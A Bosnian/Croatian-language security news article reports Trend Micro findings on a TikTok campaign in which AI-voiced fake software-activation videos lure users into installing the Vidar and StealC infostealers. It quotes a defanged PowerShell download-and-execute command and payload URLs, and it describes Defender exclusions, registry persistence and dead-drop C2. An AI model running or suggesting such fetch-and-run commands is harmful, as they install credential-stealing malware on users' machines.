Zlonamjerni softver za krađu informacija širi se putem popularnih TikTok videozapisa koji nude lažne upute za aktivaciju softvera. Sajberkriminalci su otkrili novu platformu za distribuciju zlonamjernog softvera, iskorištavajući ogromnu korisničku bazu i algoritamski doseg TikToka.
Uočena je sofisticirana kampanja društvenog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi prevarila korisnike da preuzmu opasan zlonamjerni softver za krađu informacija, prerušen u tutorijale za aktivaciju softvera. Ovi obmanjujući videozapisi obećavaju pomoć korisnicima pri aktiviranju legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga dostavljaju poznate infostelere Vidar i StealC nesuđenim žrtvama.
Ova kampanja predstavlja značajnu evoluciju u taktikama distribucije zlonamjernog softvera, udaljavajući se od tradicionalnih metoda isporuke putem weba kako bi iskoristila povjerenje i angažman koji su svojstveni platformama društvenih medija. Za razliku od uobičajenih napada koji se oslanjaju na zlonamjerne web stranice ili phishing putem e-pošte, ova operacija ugrađuje sve elemente društvenog inženjeringa direktno unutar video sadržaja, što otežava otkrivanje sigurnosnim rješenjima.
Napadači iskorištavaju viralnu prirodu TikToka, gdje je jedan zlonamjerni videozapis prikupio skoro 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što pokazuje alarmantan doseg i učinkovitost kampanje. Analitičari Trend Microa identificirali su više TikTok naloga uključenih u ovu operaciju, kao što su @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, od kojih su svi od tada deaktivirani.
Istraživači su primijetili da su ovi nalozi objavljivali izrazito slične videozapise bez lica s glasovima generiranim umjetnom inteligencijom, što sugerira automatizirani proces proizvodnje dizajniran za skalabilnost. Tehnička sofisticiranost napada postaje očigledna u njegovoj metodologiji izvršenja. Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezopasnu naredbu: `iex (irm hxxps://allaivo[.]me/spotify)`. Ovaj PowerShell skript inicira višefazni proces infekcije koji demonstrira napredne tehnike izbjegavanja.
Mehanizam infekcije i taktike postojanosti: Lanac infekcije zlonamjernog softvera otkriva pažljivo orkestrirane korake osmišljene kako bi se osiguralo uspješno kompromitiranje uz izbjegavanje otkrivanja. Nakon izvršavanja, početni PowerShell skript stvara skrivene direktorije unutar korisnikovih mapa APPDATA i LOCALAPPDATA, odmah dodajući te lokacije na popis isključenja Windows Defendera kako bi se spriječilo skeniranje antivirusnim programom. Skript zatim preuzima primarni teret sa `hxxps://amssh[.]co/file.exe`, koji sadrži varijante zlonamjernog softvera Vidar ili StealC. Mehanizam postojanosti uključuje preuzimanje dodatnog PowerShell skripta sa `hxxps://amssh[.]co/script[.]ps1` i uspostavljanje ključa registra koji osigurava izvršavanje zlonamjernog softvera pri pokretanju sistema. Značajno je da Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao Dead Drop Resolvere kako bi sakrio stvarne adrese C&C servera, čineći napore na otkrivanju i uklanjanju znatno složenijima.
